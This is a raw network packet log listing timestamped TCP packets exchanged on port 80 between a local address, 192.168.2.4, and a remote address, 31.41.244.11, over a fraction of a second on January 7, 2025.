Jan 7, 2025 10:09:01.185786963 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.185796976 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185808897 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185817957 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185826063 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.185826063 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.185858011 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.185872078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185882092 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185893059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185914993 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.185951948 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.185951948 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185965061 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185973883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185981989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185991049 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185997009 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.186002970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.186029911 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.186043024 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.186070919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.186080933 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.186090946 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.186100006 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.186131954 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.186131954 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.186240911 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.186252117 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.186261892 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.186306953 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.186315060 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.186326027 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.186351061 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.186382055 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.186402082 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.186413050 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.186471939 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.186471939 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.186511040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.186520100 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.186554909 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.186568975 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.186585903 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.186597109 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.186608076 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.186655998 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.186671019 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.186683893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.186692953 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.186695099 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.186741114 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.186758995 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.187062025 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.187103033 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.187113047 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.187139034 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.187139988 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.187159061 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.187160015 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.187170982 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.187181950 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.187222004 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.187222004 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.187248945 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.187258959 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.187268972 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.187277079 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.187285900 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.187308073 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.187308073 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.187339067 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.187341928 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.187351942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.187382936 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.187398911 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.187447071 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.187458038 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.187495947 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.187519073 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.218497992 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.218508005 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.218548059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.218576908 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.218576908 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.218586922 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.218600035 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.218601942 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.218631029 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.218671083 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.218760014 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.218770027 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.218780041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.218789101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.218797922 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.218807936 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.218816996 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.218816996 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.218846083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.218856096 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.218859911 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.218871117 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.218880892 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.218890905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.218894005 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.218928099 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.218976974 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.219000101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.219010115 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.219021082 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.219029903 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.219039917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.219050884 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.219052076 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.219077110 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.219145060 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.245253086 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.245264053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.245274067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.245284081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.245322943 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.245342016 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.245352983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.245362043 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.245383024 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.245383024 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.245408058 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.271194935 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.271213055 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.271224976 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.271297932 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.271305084 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.271305084 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.271306992 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.271325111 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.271348953 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.271348953 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.271361113 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.271404982 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.271404982 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.271548986 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.271620035 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.271631002 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.271640062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.271656990 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.271672010 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.271672010 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.271694899 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.271704912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.271714926 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.271737099 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.271738052 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.271747112 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.271756887 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.271785975 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.271789074 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.271789074 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.271795988 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.271843910 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.271843910 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.271867037 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.271877050 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.271884918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.271894932 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.271936893 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.271936893 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.271994114 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272003889 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272012949 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272022009 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272036076 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272078991 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.272078991 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.272090912 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.272094965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272105932 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272115946 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272125959 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272160053 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.272207975 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.272211075 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272222042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272234917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272243977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272253036 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272279024 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.272279024 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.272346973 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.272352934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272362947 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272372007 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272382021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272394896 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.272394896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272420883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272433996 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.272433996 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.272497892 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272511005 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272521019 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272530079 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272538900 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272547007 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.272547007 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.272548914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272569895 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.272640944 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.272644043 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272654057 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272663116 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272671938 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272682905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272702932 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.272728920 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272736073 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.272738934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272752047 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272779942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272785902 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.272794962 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272814035 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.272821903 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272833109 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272847891 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.272872925 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.272958040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.272974014 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.273004055 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.273011923 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.273037910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.273042917 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.273055077 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.273065090 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.273075104 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.273112059 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.273112059 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.273117065 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.273140907 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.273143053 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.273188114 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.273189068 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.273247957 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.273287058 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.273294926 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.273313046 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.273329020 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.273329020 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.273344040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.273353100 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.273375988 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.273390055 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.273391962 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.273402929 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.273412943 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.273411989 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.273442030 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.273442030 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.273463011 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.273706913 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.273745060 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.273766041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.273766041 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.273787975 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.273813009 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.273823023 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.273823023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.273842096 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.273852110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.273869038 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.273869038 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.273881912 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.273921967 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.273931026 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.273967028 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.274045944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.274055958 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.274065018 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.274112940 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.274112940 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.274116993 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.274128914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.274138927 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.274151087 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.274158955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.274171114 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.274171114 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.274204016 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.305480003 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.305494070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.305505991 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.305541039 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.305543900 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.305557013 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.305569887 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.305577040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.305591106 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.305600882 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.305600882 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.305603981 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.305628061 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.305633068 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.305641890 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.305645943 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.305658102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.305671930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.305676937 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.305713892 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.305747986 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.305782080 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.305799007 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.305810928 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.305815935 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.305821896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.305839062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.305850983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.305854082 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.305854082 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.305864096 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.305876970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.305879116 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.305911064 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.305934906 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.331995010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.332005978 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.332015991 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.332026958 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.332082987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.332093000 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.332098007 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.332098007 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.332113028 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.332139015 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.332159996 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.332159996 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.332235098 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.358021975 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.358053923 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.358063936 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.358098984 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.358098984 CET	50017	80	192.168.2.4	31.41.244.11
